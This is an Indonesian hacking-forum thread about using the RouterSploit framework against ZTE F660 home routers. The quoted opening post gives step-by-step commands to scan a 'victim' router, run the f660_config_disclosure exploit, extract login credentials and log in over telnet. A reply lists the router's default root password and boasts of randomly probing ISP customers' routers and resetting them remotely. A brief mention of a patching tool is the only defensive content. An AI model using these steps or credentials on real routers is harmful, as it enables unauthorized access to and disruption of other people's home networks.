Posts: 34
Threads: 4
Joined: Jul 2011
untuk F660 sebenarnya simple om ndak perlu pakek tools,
langsung aja konek ke network tu router, trus akses via telnet dengan ZOG biar ada lognya.
user: root
pass: Zte521,
ane kadang iseng acak id pelanggan di ip-dynamic untuk mendapatkan IP publicnya dan beberapa ada yang langsung bisa di akses dari luar. jadi bisa tu reset jarak jauh biar indihoy dapat komplen mulu :v
Posts: 29
Threads: 4
Joined: Nov 2014
(06-03-2016, 10:49 PM)Rues_96 Wrote: ane stuck di sini om
ImportError: No module named cryptography.hazmat.backends
tambahin dulu module cryptonya om
Code: pip install cryptography
untuk melihat daftar module paket python
untuk melihat status module sudah ditambahkan
Code: dpkg --status python-crypto
(06-04-2016, 09:09 AM)ediyantosuroso Wrote: untuk F660 sebenarnya simple om ndak perlu pakek tools,
langsung aja konek ke network tu router, trus akses via telnet dengan ZOG biar ada lognya.
user: root
pass: Zte521,
ane kadang iseng acak id pelanggan di ip-dynamic untuk mendapatkan IP publicnya dan beberapa ada yang langsung bisa di akses dari luar. jadi bisa tu reset jarak jauh biar indihoy dapat komplen mulu :v
yap, benar skali om, krena user am pwd modem masih standar, bisa dilihat aj d modulenya
manfaat tool ini memudahkan kita utk mndapatkan user am pwd pelanggan, tanpa harus masuk ke direktori cfg utk menampilkan isi dari file db_user_cfg.xml utk memperoleh informasi berupa user, pwd, essid, dan keyphase modem cmiww
klau buat iseng apalagi smpai reset modem pelanggan, saya gk pernah om
karena saya tau gimna capeknya kerja di lapangan, apalagi datang kerumah pelanggan yang gangguannya cuma hanya untuk reset modemĀ
codename@tong:~# Try Harder!
(This post was last modified: 06-06-2016, 03:41 AM by tong.)
Posts: 59
Threads: 6
Joined: Jan 2014
(05-26-2016, 07:21 PM)tong Wrote: Assalamuallaikum
Kali ini saya mau share tools untuk eksploitasi pada router, tidak semua router bisa di eksploitasi dengan RouterSploit, hanya yang vulnerable saja pada module
yang sudah di sediakan.
Untuk instalasi pada OSX & Ubuntu bisa dilihat di sini https://github.com/reverse-shell/routers...buntu-1604
Installation
Code: git clone https://github.com/reverse-shell/routersploit
Nah disini saya sudah mendapatkan victim, jangan lupa scan dulu dengan module autopwn, untuk mengecek apakah router vulnerable dengan module yang disediakan oleh RouterSploit.
Usage
Code: python rsf.py
use scanners/autopwn
set target "ip victim"
kemudian jalankan module
Ternyata router vulnerable, langsung saja kita exploit router dengan module yang direkomendasikan RouterSploit. Disini saya gunakan module zte/f660_config_disclosure
Code: use exploits/zte/f660_config_disclosure
set target "ip victim"
run
wow, exploit berhasil, saya mendapatkan username dan password router, mari coba kita login ke telnet server pada modem router
wew, login sukses vroh
ow iya, untuk update toolsnya juga simple kok
Update
Code: cd routersploit
git pull
Demikianlah mengenai tools RouterSploit
Terimakasih dan semoga bermanfaat
source :
Patching ZTE F6XX Router
Nih buat yang mau ngamanin routernya, tools buatan om @devilscream_
mantabb om, izin icipp..icipp... kimochii...
Posts: 29
Threads: 4
Joined: Nov 2014
(06-06-2016, 10:35 AM)hehehe Wrote: (05-26-2016, 07:21 PM)tong Wrote: Assalamuallaikum
Kali ini saya mau share tools untuk eksploitasi pada router, tidak semua router bisa di eksploitasi dengan RouterSploit, hanya yang vulnerable saja pada module
yang sudah di sediakan.
Untuk instalasi pada OSX & Ubuntu bisa dilihat di sini https://github.com/reverse-shell/routers...buntu-1604
Installation
Code: git clone https://github.com/reverse-shell/routersploit
Nah disini saya sudah mendapatkan victim, jangan lupa scan dulu dengan module autopwn, untuk mengecek apakah router vulnerable dengan module yang disediakan oleh RouterSploit.
Usage
Code: python rsf.py
use scanners/autopwn
set target "ip victim"
kemudian jalankan module
Ternyata router vulnerable, langsung saja kita exploit router dengan module yang direkomendasikan RouterSploit. Disini saya gunakan module zte/f660_config_disclosure
Code: use exploits/zte/f660_config_disclosure
set target "ip victim"
run
wow, exploit berhasil, saya mendapatkan username dan password router, mari coba kita login ke telnet server pada modem router
wew, login sukses vroh
ow iya, untuk update toolsnya juga simple kok
Update
Code: cd routersploit
git pull
Demikianlah mengenai tools RouterSploit
Terimakasih dan semoga bermanfaat
source :
Patching ZTE F6XX Router
Nih buat yang mau ngamanin routernya, tools buatan om @devilscream_
mantabb om, izin icipp..icipp... kimochii...
monggo om, ikeh ikeh kimochii :v
codename@tong:~# Try Harder!
Posts: 11
Threads: 0
Joined: Jun 2016
ini kenapa ya ?
kan pake perintah instal git clone ga bisa, trus pake apt get bisa, tp dengan versi 2.0.0
dan coba saya update ttp sama, akhirnya saya git clone lagi bisa
tp ttp aja versinya 2.0.0
mohon pencerahanya
(This post was last modified: 06-14-2016, 02:44 AM by jaenab.)
Posts: 24
Threads: 4
Joined: Apr 2016
klo punya wifi.id bisa gak ? XD
Posts: 11
Threads: 0
Joined: Jun 2016
(06-14-2016, 09:25 PM)Mudksovic Wrote: klo punya wifi.id bisa gak ? XD
kaya e bisa, kan intinya kita itu cari celahnya di routernya
Posts: 29
Threads: 4
Joined: Nov 2014
(06-14-2016, 02:42 AM)jaenab Wrote:
ini kenapa ya ?
kan pake perintah instal git clone ga bisa, trus pake apt get bisa, tp dengan versi 2.0.0
dan coba saya update ttp sama, akhirnya saya git clone lagi bisa
tp ttp aja versinya 2.0.0
mohon pencerahanya
Tlong perbaiki lgi ss nya om, kgak nongol
(06-15-2016, 02:49 AM)jaenab Wrote: (06-14-2016, 09:25 PM)Mudksovic Wrote: klo punya wifi.id bisa gak ? XD
kaya e bisa, kan intinya kita itu cari celahnya di routernya
iye bner om, hnya yg vulnerable saja, dan juga trgantung modul yg disediakan
codename@tong:~# Try Harder!
Posts: 200
Threads: 20
Joined: Dec 2012
sekilas hampir mirip sama metasploit yah om
Posts: 11
Threads: 0
Joined: Jun 2016
(06-15-2016, 04:48 AM)tong Wrote: (06-14-2016, 02:42 AM)jaenab Wrote:
ini kenapa ya ?
kan pake perintah instal git clone ga bisa, trus pake apt get bisa, tp dengan versi 2.0.0
dan coba saya update ttp sama, akhirnya saya git clone lagi bisa
tp ttp aja versinya 2.0.0
mohon pencerahanya
Tlong perbaiki lgi ss nya om, kgak nongol
(06-15-2016, 02:49 AM)jaenab Wrote: (06-14-2016, 09:25 PM)Mudksovic Wrote: klo punya wifi.id bisa gak ? XD
kaya e bisa, kan intinya kita itu cari celahnya di routernya
iye bner om, hnya yg vulnerable saja, dan juga trgantung modul yg disediakan
|